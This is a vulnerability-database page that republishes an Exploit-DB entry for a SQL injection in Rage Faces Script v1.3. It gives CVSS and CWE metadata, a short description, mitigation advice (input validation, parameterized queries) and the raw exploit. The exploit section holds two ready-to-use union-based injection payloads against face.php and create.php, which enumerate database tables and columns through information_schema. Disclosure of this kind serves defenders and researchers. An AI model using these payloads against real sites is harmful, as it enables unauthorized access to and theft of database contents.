header-logo
Suggest Exploit
vendor:
Rage Faces Script
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Rage Faces Script
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:memesoftware:rage_faces_script:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Rage Faces Script v1.3 – SQL Injection

A SQL injection vulnerability exists in Rage Faces Script v1.3. An attacker can exploit this vulnerability to inject malicious SQL queries into the application, allowing them to gain access to sensitive information stored in the database. The vulnerability is due to insufficient input validation in the application. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL code to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Rage Faces Script v1.3 - SQL Injection
# Google Dork: N/A
# Date: 01.03.2017
# Vendor Homepage: http://www.memesoftware.com/
# Software: http://www.memesoftware.com/ragefaces.php
# Demo: http://ragefaces.memesoftware.com/
# Version: 1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/face.php?face=[SQL]
-2')+/*!50000union*/+select+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5-- -
# http://localhost/[PATH]/create.php?create=[SQL]
-1'+/*!50000union*/+Select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5,6,7,8,9-- -
# Etc... 
# # # # #

Navigation

Suggest Exploit

Services By CQR